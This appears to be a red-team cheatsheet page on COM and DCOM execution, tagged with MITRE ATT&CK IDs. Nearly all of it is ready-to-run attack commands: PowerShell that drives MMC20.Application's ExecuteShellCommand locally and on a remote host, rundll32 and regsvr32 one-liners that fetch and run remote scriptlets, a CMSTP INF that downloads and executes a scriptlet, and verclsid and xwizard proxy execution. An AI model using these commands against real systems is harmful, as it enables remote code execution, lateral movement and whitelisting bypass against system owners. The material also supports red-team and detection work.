πCOM Execution - T1559.001
Templates and methods of quickly executing COM and DCOM
Windows Components Object Model quick execution cheatsheet
Powershell
Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID
Execution via CLSID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Execution via ProgID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
DCOM Execution
Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (127.0.0.1)
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Rundll32
Execution via CLSID
Rundll32.exe -sta {GUID}
Execution via ProgID
Rundll32.exe -sta Scripting.Dictionary
Execution via shell32.dll
# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}
Scriptlet Execution from Remote Server
# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:β\..\mshtml,RunHTMLApplication β;document.write();GetObject(βscript:http://127.0.0.1:8080/calc.sct").Exec();
Remote Scriptlet via INF file
# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1
Regsvr32
COM Local Scriptlet Execution
# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct
COM Scriptlet Execution from Remote Server
# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll
CMSTP
Execution via INF file that downloads and executes a scriptlet (sct)
# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
cmstp.exe /su test.inf
PyCOM
π οΈ
Verclsid
Execution via CLSID
verclsid.exe /S /C {CLSID}
Xwizard
Execution via CLSID
xwizard.exe RunWizard /taero /u {CLSID}
ATT&CK Techniques in this Page
Command and Scripting Interpreter: PowerShell - T1059.001
Inter-Process Communication: Component Object Model - T1559.001
System Binary Proxy Execution: CMSTP - T1218.003
System Binary Proxy Execution: Rundll32 - T1218.011
System Binary Proxy Execution: Verclsid - T1218.012
System Binary Proxy Execution: Regsvr32 - T1218.010
Last updated
Was this helpful?